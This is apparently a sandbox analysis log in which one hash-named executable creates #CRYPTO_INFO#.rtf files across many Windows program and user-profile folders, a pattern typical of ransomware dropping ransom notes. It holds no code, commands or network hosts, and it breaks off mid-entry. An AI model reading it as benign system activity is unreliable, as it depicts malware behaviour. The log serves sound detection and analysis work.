8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\w0w630d3.default-release\storage\default\moz-extension+++9c60e9c0-f49a-444b-8b0d-ae16b1b09ce8^userContextId=4294967295\idb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\TileDataLayer\Database\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\regid.1991-06.com.microsoft\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{70f28438-6b75-41ad-90c9-c2a68ac57bec}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created 